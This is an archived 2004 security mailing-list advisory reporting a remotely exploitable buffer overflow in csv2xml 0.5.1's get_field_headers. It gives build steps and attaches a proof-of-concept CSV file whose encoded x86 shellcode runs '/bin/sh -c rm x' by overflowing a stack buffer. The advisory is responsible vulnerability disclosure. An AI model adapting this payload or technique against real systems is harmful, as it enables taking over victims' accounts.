Mailing-List: contact securesoftware-help@list.cr.yp.to; run by ezmlm Delivered-To: mailing list securesoftware@list.cr.yp.to Received: (qmail 47276 invoked by uid 1017); 15 Dec 2004 08:28:20 -0000 Date: 15 Dec 2004 08:28:20 -0000 Message-ID: <20041215082820.47275.qmail@cr.yp.to> Mail-Followup-To: securesoftware@list.cr.yp.to, jacobrhoden@users.sourceforge.net Automatic-Legal-Notices: See http://cr.yp.to/mailcopyright.html. From: "D. J. Bernstein" To: securesoftware@list.cr.yp.to, jacobrhoden@users.sourceforge.net Subject: [remote] [control] csv2xml 0.5.1 get_field_headers overflows token Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="ReaqsoxgOBHFXBhH" Content-Disposition: inline --ReaqsoxgOBHFXBhH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Limin Wang, a student in my Fall 2004 UNIX Security Holes course, has discovered a remotely exploitable security hole in csv2xml. I'm publishing this notice, but all the discovery credits should be assigned to Wang. You are at risk if you take a CSV file from an email message (or a web page or any other source that could be controlled by an attacker) and feed that document through csv2xml -m=2. (The csv2xml documentation does not tell users to avoid taking input from the network.) Whoever provides that document then has complete control over your account: she can read and modify your files, watch the programs you're running, etc. Proof of concept: On an x86 computer running FreeBSD 4.10, type wget http://umn.dl.sourceforge.net/sourceforge/csv2xml/csv2xml-0.5.1.tar.gz gunzip < csv2xml-0.5.1.tar.gz | tar -xf - cd csv2xml-0.5.1 make to download and compile the csv2xml program, version 0.5.1 (current). Then save the file 53.csv attached to this message, and type src/csv2xml -m=2 < 53.csv > 53.xml with the unauthorized result that a file named x is removed from the current directory. (I tested this with a 449-byte environment, as reported by printenv | wc -c.) Here's the bug: In csv2xml.cpp, get_field_headers() uses get_csv_token() to read any number of bytes into a 1001-byte token[] array. This can be blamed on get_csv_token(), which has a fundamentally broken gets()-style interface. ---D. J. Bernstein, Associate Professor, Department of Mathematics, Statistics, and Computer Science, University of Illinois at Chicago --ReaqsoxgOBHFXBhH Content-Type: text/plain; charset=unknown-8bit Content-Disposition: attachment; filename="53.csv" Content-Transfer-Encoding: quoted-printable AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=EBGY=89=CA=83=C2=18=89=111=C0=89A=04=83=C2= =13=89Q=08=83=C2=08=89Q=0C=83=C2=03=89Q=10=89A=14=88A*=88A2=88A5=88A:Q=83= =C1=08Q=83=C1 =83=C1=03Q=83=C0;P=CD=801=C0P@P=CD=80=E8=B4=FF=FF=FFabcdefghi= jklmnopqrstuvwxPATH=3D/bin:/usr/bin /bin/sh -c rm x.DEFGHIJKLMNOPQRSTUVWXYZ= ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVW= XYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRST= UVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQ= RSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMN= OPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJK= LMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGH= IJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDE= FGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRST=84=F8= =BF=BF=84=F8=BF=BF=84=F8=BF=BF,field2 --ReaqsoxgOBHFXBhH--